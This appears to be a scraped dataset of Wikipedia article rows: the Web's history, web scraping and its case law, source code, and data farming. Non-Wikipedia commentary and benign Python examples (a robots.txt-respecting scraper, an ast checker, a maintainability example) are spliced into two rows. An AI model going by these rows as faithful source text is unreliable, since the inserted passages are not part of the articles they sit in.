59 Mozilla and Apple both released browsers that aimed to be more standards compliant (Firefox and Safari), but were unable to dislodge IE as the dominant browser. As the Web grew in the mid 1990s, web directories and primitive search engines were created to index pages and allow people to find things. Commercial use restrictions on the Internet were lifted in 1995 when NSFNET was shut down. In the US, the online service America Online (AOL) offered their users a connection to the Internet via their own internal browser, using a dial-up Internet connection. In January 1994, Yahoo was founded by Jerry Yang and David Filo, then students at Stanford University. Yahoo Directory became the first popular web directory. Yahoo Search, launched the same year, was the first popular search engine on the World Wide Web. Yahoo became the quintessential example of a first mover on the Web. Online shopping began to emerge with the launch of Amazon's shopping site by Jeff Bezos in 1995 and eBay by Pierre Omidyar the same year. By 1994, Marc Andreessen's Netscape Navigator superseded Mosaic in popularity, holding the position for some time. Bill Gates outlined Microsoft's strategy to dominate the Internet in his Tidal Wave memo in 1995. 60 With the release of Windows 95 and the popular Internet Explorer browser, many public companies began to develop a Web presence. At first, people mainly anticipated the possibilities of free publishing and instant worldwide information. By the late 1990s, the directory model had given way to search engines, corresponding with the rise of Google Search, which developed new approaches to relevancy ranking. Directory features, while still commonly available, became after-thoughts to search engines. Netscape had a very successful IPO valuing the company at $2.9 billion despite the lack of profits and triggering the dot-com bubble. 61 Increasing familiarity with the Web led to the growth of direct Web-based commerce (e-commerce) and instantaneous group communications worldwide. Many dot-com companies, displaying products on hypertext webpages, were added into the Web. Over the next 5 years, over a trillion dollars was raised to fund thousands of startups consisting of little more than a website. During the dot-com boom, many companies vied to create a dominant web portal in the belief that such a website would best be able to attract a large audience that in turn would attract online advertising revenue. While most of these portals offered a search engine, they were not interested in encouraging users to find other websites and leave the portal and instead concentrated on "sticky" content. 62 In contrast, Google was a stripped-down search engine that delivered superior results. 63 It was a hit with users who switched from portals to Google. Furthermore, with AdWords, Google had an effective business model. 64 65 AOL bought Netscape in 1998. 66 In spite of their early success, Netscape was unable to fend off Microsoft. 67 Internet Explorer and a variety of other browsers almost completely replaced it. Faster broadband internet connections replaced many dial-up connections from the beginning of the 2000s. With the bursting of the dot-com bubble, many web portals either scaled back operations, floundered, 68 or shut down entirely. 69 70 71 AOL disbanded Netscape in 2003. 72 Web server software was developed to allow computers to act as web servers. 
The first web servers supported only static files, such as HTML (and images), but now they commonly allow embedding of server side applications. Web framework software enabled building and deploying web applications. Content management systems (CMS) were developed to organize and facilitate collaborative content creation. Many of them were built on top of separate content management frameworks. After Robert McCool joined Netscape, development on the NCSA HTTPd server languished. In 1995, Brian Behlendorf and Cliff Skolnick created a mailing list to coordinate efforts to fix bugs and make improvements to HTTPd. 73 They called their version of HTTPd, Apache. 74 Apache quickly became the dominant server on the Web. 75 After adding support for modules, Apache was able to allow developers to handle web requests with a variety of languages including Perl, PHP and Python. Together with Linux and MySQL, it became known as the LAMP platform. Following the success of Apache, the Apache Software Foundation was founded in 1999 and produced many open source web software projects in the same collaborative spirit. After graduating from UIUC, Andreessen and Jim Clark, former CEO of Silicon Graphics, met and formed Mosaic Communications Corporation in April 1994 to develop the Mosaic Netscape browser commercially. The company later changed its name to Netscape, and the browser was developed further as Netscape Navigator, which soon became the dominant web client. They also released the Netsite Commerce web server which could handle SSL requests, thus enabling e-commerce on the Web. 76 SSL became the standard method to encrypt web traffic. Navigator 1.0 also introduced cookies, but Netscape did not publicize this feature. Netscape followed up with Navigator 2 in 1995 introducing frames, Java applets and JavaScript. In 1998, Netscape made Navigator open source and launched Mozilla. 77 Microsoft licensed Mosaic from Spyglass and released Internet Explorer 1.0 that year and IE2 later the same year. IE2 added features pioneered at Netscape such as cookies, SSL, and JavaScript. The browser wars became a competition for dominance when Explorer was bundled with Windows. 78 79 This led to the United States v. Microsoft Corporation antitrust lawsuit. IE3, released in 1996, added support for Java applets, ActiveX, and CSS. At this point, Microsoft began bundling IE with Windows. IE3 managed to increase Microsoft's share of the browser market from under 10% to over 20%. 80 IE4, released the following year, introduced Dynamic HTML setting the stage for the Web 2.0 revolution. By 1998, IE was able to capture the majority of the desktop browser market. 67 It would be the dominant browser for the next fourteen years. Google released their Chrome browser in 2008 with the first JIT JavaScript engine, V8. Chrome overtook IE to become the dominant desktop browser in four years, 81 and overtook Safari to become the dominant mobile browser in two. 82 At the same time, Google open sourced Chrome's codebase as Chromium. 83 Ryan Dahl used Chromium's V8 engine in 2009 to power an event driven runtime system, Node.js, which allowed JavaScript code to be used on servers as well as browsers. This led to the development of new software stacks such as MEAN. Thanks to frameworks such as Electron, developers can bundle up node applications as standalone desktop applications such as Slack. Acer and Samsung began selling Chromebooks, cheap laptops running ChromeOS capable of running web apps, in 2011. 
Over the next decade, more companies offered Chromebooks. Chromebooks outsold MacOS devices in 2020 to become the second most popular OS in the world. 84 Other notable web browsers emerged including Mozilla's Firefox, Opera's Opera browser and Apple's Safari. Web pages were initially conceived as structured documents based upon HTML. They could include images, video, and other content, although the use of media was initially relatively limited and the content was mainly static. By the mid 2000s, new approaches to sharing and exchanging content, such as blogs and RSS, rapidly gained acceptance on the Web. The video-sharing website YouTube launched the concept of user-generated content. 85 As new technologies made it easier to create websites that behaved dynamically, the Web attained greater ease of use and gained a sense of interactivity which ushered in a period of rapid popularization. This new era also brought into existence social networking websites, such as Friendster, MySpace, Facebook, and Twitter, and photo- and video-sharing websites such as Flickr and, later, Instagram which gained users rapidly and became a central part of youth culture. Wikipedia's user-edited content quickly displaced the professionally-written Microsoft Encarta. 86 The popularity of these sites, combined with developments in the technology that enabled them, and the increasing availability and affordability of high-speed connections made video content far more common on all kinds of websites. This new media-rich model for information exchange, featuring user-generated and user-edited websites, was dubbed Web 2.0, a term coined in 1999 by Darcy DiNucci 87 and popularized in 2004 at the Web 2.0 Conference. The Web 2.0 boom drew investment from companies worldwide and saw many new service-oriented startups catering to a newly "democratized" Web. 88 89 90 91 92 93 JavaScript made the development of interactive web applications possible. Web pages could run JavaScript and respond to user input, but they could not interact with the network. Browsers could submit data to servers via forms and receive new pages, but this was slow compared to traditional desktop applications. Developers that wanted to offer sophisticated applications over the Web used Java or nonstandard solutions such as Adobe Flash or Microsoft's ActiveX. Microsoft added a little-noticed feature called XMLHttpRequest to Internet Explorer in 1999, which enabled a web page to communicate with the server while remaining visible. Developers at Oddpost used this feature in 2002 to create the first Ajax application, a webmail client that performed as well as a desktop application. 94 Ajax apps were revolutionary. Web pages evolved beyond static documents to full-blown applications. Websites began offering APIs in addition to webpages. Developers created a plethora of Ajax apps including widgets, mashups and new types of social apps. Analysts called it Web 2.0. 95 Browser vendors improved the performance of their JavaScript engines 96 and dropped support for Flash and Java. 97 98 Traditional client server applications were replaced by cloud apps. Amazon reinvented itself as a cloud service provider. The use of social media on the Web has become ubiquitous in everyday life. 99 100 The 2010s also saw the rise of streaming services, such as Netflix. In spite of the success of Web 2.0 applications, the W3C forged ahead with their plan to replace HTML with XHTML and represent all data in XML. 
In 2004, representatives from Mozilla, Opera, and Apple formed an opposing group, the Web Hypertext Application Technology Working Group (WHATWG), dedicated to improving HTML while maintaining backward compatibility. 101 For the next several years, websites did not transition their content to XHTML; browser vendors did not adopt XHTML2; and developers eschewed XML in favor of JSON. 102 By 2007, the W3C conceded and announced they were restarting work on HTML 103 and in 2009, they officially abandoned XHTML. 104 In 2019, the W3C ceded control of the HTML specification, now called the HTML Living Standard, to WHATWG. 105 Microsoft rewrote their Edge browser in 2021 to use Chromium as its code base in order to be more compatible with Chrome. 106 The increasing use of encrypted connections (HTTPS) enabled e-commerce and online banking. Nonetheless, the 2010s saw the emergence of various controversial trends, such as internet censorship and the growth of cybercrime, including web-based cyberattacks and ransomware. 107 108 Early attempts to allow wireless devices to access the Web used simplified formats such as i-mode and WAP. Apple introduced the first smartphone in 2007 with a full-featured browser. Other companies followed suit and in 2011, smartphone sales overtook PCs. 109 Since 2016, most visitors access websites with mobile devices 110 which led to the adoption of responsive web design. Apple, Mozilla, and Google have taken different approaches to integrating smartphones with modern web apps. Apple initially promoted web apps for the iPhone, but then encouraged developers to make native apps. 111 Mozilla announced Web APIs in 2011 to allow webapps to access hardware features such as audio, camera or GPS. 112 Frameworks such as Cordova and Ionic allow developers to build hybrid apps. Mozilla released a mobile OS designed to run web apps in 2012, 113 but discontinued it in 2015. 114 Google announced specifications for Accelerated Mobile Pages (AMP), 115 and progressive web applications (PWA) in 2015. 116 AMPs use a combination of HTML, JavaScript, and Web Components to optimize web pages for mobile devices; and PWAs are web pages that, with a combination of web workers and manifest files, can be saved to a mobile device and opened like a native app. The extension of the Web to facilitate data exchange was explored as an approach to create a Semantic Web (sometimes called Web 3.0). This involved using machine-readable information and interoperability standards to enable context-understanding programs to intelligently select information for users. 117 Continued extension of the Web has focused on connecting devices to the Internet, coined Intelligent Device Management. As Internet connectivity becomes ubiquitous, manufacturers have started to leverage the expanded computing power of their devices to enhance their usability and capability. Through Internet connectivity, manufacturers are now able to interact with the devices they have sold and shipped to their customers, and customers are able to interact with the manufacturer (and other providers) to access a lot of new content. 118 This phenomenon has led to the rise of the Internet of Things (IoT), 119 where modern devices are connected through sensors, software, and other technologies that exchange information with other devices and systems on the Internet. This creates an environment where data can be collected and analyzed instantly, providing better insights and improving the decision-making process. 
Additionally, the integration of AI with IoT devices continues to improve their capabilities, allowing them to predict customer needs and perform tasks, increasing efficiency and user satisfaction. Web3 (sometimes also referred to as Web 3.0) is an idea for a decentralized Web based on public blockchains, smart contracts, digital tokens and digital wallets. 120 Historiography of the Web poses specific challenges including, disposable data, missing links, lost content and archived websites, which have consequences for web historians. Sites such as the Internet Archive aim to preserve content. 121 122 |
142 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-3 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include:
BeautifulSoup: a Python library that provides simple methods for extracting data from HTML and XML files.
Scrapy: an open-source and collaborative web crawling framework for Python that allows you to extract, process, and store data.
Octoparse: a no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills.
ParseHub: another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites.
Apify: a platform that offers a wide range of scraping tools and the ability to create custom scrapers.
InstantAPI.ai: an AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization.
Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattels. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, arguing that the prevailing law in this case should be US copyright law and that, under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter, blocked their IP addresses, and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore an emerging pattern: the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which remanded it to the Ninth Circuit to reconsider in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
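The scraped article above describes both the basic extraction techniques (regular-expression matching and DOM parsing) and the fact that site administrators deploy countermeasures to stop or slow bots. The sketch below ties the two together using the same Python libraries this document already relies on: it checks robots.txt before fetching, rate-limits its requests, and then pulls paragraph text with BeautifulSoup plus a small regular expression. It is a minimal illustration under stated assumptions, not a hardened crawler; the target URL, the user-agent string, the delay value, and the cleanup pattern are all example choices, not anything mandated by the scraped text.

import re
import time
import urllib.robotparser
from urllib.parse import urlparse

import requests
from bs4 import BeautifulSoup


def polite_fetch(url, user_agent="example-scraper/0.1", delay=2.0):
    """Fetch a page only if robots.txt allows it, then pause `delay` seconds."""
    parts = urlparse(url)
    rp = urllib.robotparser.RobotFileParser()
    rp.set_url(f"{parts.scheme}://{parts.netloc}/robots.txt")
    rp.read()
    if not rp.can_fetch(user_agent, url):
        raise PermissionError(f"robots.txt disallows fetching {url}")
    response = requests.get(url, headers={"User-Agent": user_agent}, timeout=10)
    response.raise_for_status()
    time.sleep(delay)  # simple rate limit so the crawl does not hammer the server
    return response.text


def extract_paragraphs(html):
    """Parse the DOM, pull paragraph text, and strip bracketed footnote markers."""
    soup = BeautifulSoup(html, "html.parser")
    paragraphs = [p.get_text(" ", strip=True) for p in soup.find_all("p")]
    # Illustrative cleanup: drop markers like [12] left over from the markup.
    return [re.sub(r"\[\d+\]", "", text) for text in paragraphs if text]


if __name__ == "__main__":
    # Hypothetical target chosen only for demonstration.
    html = polite_fetch("https://en.wikipedia.org/wiki/Web_scraping")
    for para in extract_paragraphs(html)[:3]:
        print(para[:120])

Checking robots.txt and pacing requests addresses exactly the administrator countermeasures the article alludes to: crawlers that ignore them are the ones most likely to be blocked or, as in the QVC dispute above, accused of overloading a site.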
143 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Source_code | In computing, source code, or simply code or source, is a plain text computer program written in a programming language. A programmer writes the human readable source code to control the behavior of a computer. Since a computer, at base, only understands machine code, source code must be translated before a computer can execute it. The translation process can be implemented three ways. Source code can be converted into machine code by a compiler or an assembler. The resulting executable is machine code ready for the computer. Alternatively, source code can be executed without conversion via an interpreter. An interpreter loads the source code into memory. It simultaneously translates and executes each statement. A method that combines compilation and interpretation is to first produce bytecode. Bytecode is an intermediate representation of source code that is quickly interpreted. The first programmable computers, which appeared at the end of the 1940s, 2 were programmed in machine language (simple instructions that could be directly executed by the processor). Machine language was difficult to debug and was not portable between different computer systems. 3 Initially, hardware resources were scarce and expensive, while human resources were cheaper. 4 As programs grew more complex, programmer productivity became a bottleneck. This led to the introduction of high-level programming languages such as Fortran in the mid 1950s. These languages abstracted away the details of the hardware, instead being designed to express algorithms that could be understood more easily by humans. 5 6 As instructions distinct from the underlying computer hardware, software is therefore relatively recent, dating to these early high-level programming languages such as Fortran, Lisp, and Cobol. 6 The invention of high-level programming languages was simultaneous with the compilers needed to translate the source code automatically into machine code that can be directly executed on the computer hardware. 7 Source code is the form of code that is modified directly by humans, typically in a high-level programming language. Object code can be directly executed by the machine and is generated automatically from the source code, often via an intermediate step, assembly language. While object code will only work on a specific platform, source code can be ported to a different machine and recompiled there. For the same source code, object code can vary significantly—not only based on the machine for which it is compiled, but also based on performance optimization from the compiler. 8 9 Most programs do not contain all the resources needed to run them and rely on external libraries. Part of the compiler's function is to link these files in such a way that the program can be executed by the hardware. 10 Software developers often use configuration management to track changes to source code files (version control). The configuration management system also keeps track of which object code file corresponds to which version of the source code file. 11 The number of lines of source code is often used as a metric when evaluating the productivity of computer programmers, the economic value of a code base, effort estimation for projects in development, and the ongoing cost of software maintenance after release. 12 Source code is also used to communicate algorithms between people e.g., code snippets online or in books. 
13 Computer programmers may find it helpful to review existing source code to learn about programming techniques. 13 The sharing of source code between developers is frequently cited as a contributing factor to the maturation of their programming skills. 13 Some people consider source code an expressive artistic medium. 14 Source code often contains comments—blocks of text marked for the compiler to ignore. This content is not part of the program logic, but is instead intended to help readers understand the program. 15 Companies often keep the source code confidential in order to hide algorithms considered a trade secret. Proprietary, secret source code and algorithms are widely used for sensitive government applications such as criminal justice, which results in black box behavior with a lack of transparency into the algorithm's methodology. The result is avoidance of public scrutiny of issues such as bias. 16 Access to the source code (not just the object code) is essential to modifying it. 17 Understanding existing code is necessary to understand how it works 17 and before modifying it. 18 The rate of understanding depends both on the code base as well as the skill of the programmer. 19 Experienced programmers have an easier time understanding what the code does at a high level. 20 Software visualization is sometimes used to speed up this process. 21 Many software programmers use an integrated development environment (IDE) to improve their productivity. IDEs typically have several features built in, including a source-code editor that can alert the programmer to common errors. 22 Modification often includes code refactoring (improving the structure without changing functionality) and restructuring (improving structure and functionality at the same time). 23 Nearly every change to code will introduce new bugs or unexpected ripple effects, which require another round of fixes. 18 Code reviews by other developers are often used to scrutinize new code added to a project. 24 The purpose of this phase is often to verify that the code meets style and maintainability standards and that it is a correct implementation of the software design. 25 According to some estimates, code review dramatically reduce the number of bugs persisting after software testing is complete. 24 Along with software testing that works by executing the code, static program analysis uses automated tools to detect problems with the source code. Many IDEs support code analysis tools, which might provide metrics on the clarity and maintainability of the code. 26 Debuggers are tools that often enable programmers to step through execution while keeping track of which source code corresponds to each change of state. 27 Source code files in a high-level programming language must go through a stage of preprocessing into machine code before the instructions can be carried out. 7 After being compiled, the program can be saved as an object file and the loader (part of the operating system) can take this saved file and execute it as a process on the computer hardware. 10 Some programming languages use an interpreter instead of a compiler. An interpreter converts the program into machine code at run time, which makes them 10 to 100 times slower than compiled programming languages. 22 28 Software quality is an overarching term that can refer to a code's correct and efficient behavior, its reusability and portability, or the ease of modification. 
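As a small illustration of the static program analysis mentioned above (inspecting source code without executing it), the sketch below uses Python's ast module to flag functions that lack docstrings. It is a toy check assuming nothing beyond the standard library; real analysis tools apply many more rules.

import ast

SOURCE = '''
def add(a, b):
    """Return the sum of a and b."""
    return a + b

def undocumented(x):
    return x * 2
'''

tree = ast.parse(SOURCE)
for node in ast.walk(tree):
    # Report any function definition that has no docstring
    if isinstance(node, ast.FunctionDef) and ast.get_docstring(node) is None:
        print(f"line {node.lineno}: function '{node.name}' has no docstring")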
29 It is usually more cost-effective to build quality into the product from the beginning rather than try to add it later in the development process. 30 Higher quality code will reduce lifetime cost to both suppliers and customers as it is more reliable and easier to maintain. 31 32 Maintainability is the quality of software enabling it to be easily modified without breaking existing functionality. 33 Following coding conventions such as using clear function and variable names that correspond to their purpose makes maintenance easier. 34 Use of conditional loop statements only if the code could execute more than once, and eliminating code that will never execute can also increase understandability. 35 Many software development organizations neglect maintainability during the development phase, even though it will increase long-term costs. 32 Technical debt is incurred when programmers, often out of laziness or urgency to meet a deadline, choose quick and dirty solutions rather than build maintainability into their code. 36 A common cause is underestimates in software development effort estimation, leading to insufficient resources allocated to development. 37 A challenge with maintainability is that many software engineering courses do not emphasize it. 38 Development engineers who know that they will not be responsible for maintaining the software do not have an incentive to build in maintainability. 18 The situation varies worldwide, but in the United States before 1974, software and its source code was not copyrightable and therefore always public domain software. 39 In 1974, the US Commission on New Technological Uses of Copyrighted Works (CONTU) decided that "computer programs, to the extent that they embody an author's original creation, are proper subject matter of copyright". 40 41 Proprietary software is rarely distributed as source code. 42 Although the term open-source software literally refers to public access to the source code, 43 open-source software has additional requirements: free redistribution, permission to modify the source code and release derivative works under the same license, and nondiscrimination between different uses—including commercial use. 44 45 The free reusability of open-source software can speed up development. 46 |
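The maintainability conventions mentioned earlier in this passage (descriptive names, removing code that can never execute) are easiest to see side by side. The sketch below is a generic before/after example, not drawn from any of the cited sources; the function names and the 0.07 rate are arbitrary.

# Harder to maintain: cryptic names and a statement that can never execute
def calc(a, b):
    t = a * b * 0.07
    return t
    print(t)  # dead code: unreachable after the return

# Easier to maintain: names that state the intent, and no dead code
def sales_tax(price, quantity, rate=0.07):
    """Return the sales tax owed for an order line."""
    return price * quantity * rate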
144 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_farming | Data farming is the process of using designed computational experiments to “grow” data, which can then be analyzed using statistical and visualization techniques to obtain insight into complex systems. These methods can be applied to any computational model. Data farming differs from Data mining, as the following metaphors indicate: Miners seek valuable nuggets of ore buried in the earth, but have no control over what is out there or how hard it is to extract the nuggets from their surroundings. ... Similarly, data miners seek to uncover valuable nuggets of information buried within massive amounts of data. Data-mining techniques use statistical and graphical measures to try to identify interesting correlations or clusters in the data set. Farmers cultivate the land to maximize their yield. They manipulate the environment to their advantage using irrigation, pest control, crop rotation, fertilizer, and more. Small-scale designed experiments let them determine whether these treatments are effective. Similarly, data farmers manipulate simulation models to their advantage, using large-scale designed experimentation to grow data from their models in a manner that easily lets them extract useful information. ...the results can reveal root cause-and-effect relationships between the model input factors and the model responses, in addition to rich graphical and statistical views of these relationships. 1 A NATO modeling and simulation task group has documented the data farming process in the Final Report of MSG 088. 2 Here, data farming uses collaborative processes in combining rapid scenario prototyping, simulation modeling, design of experiments, high performance computing, and analysis and visualization in an iterative loop-of-loops. 3 The science of Design of Experiments (DOE) has been around for over a century, pioneered by R.A. Fisher for agricultural studies. 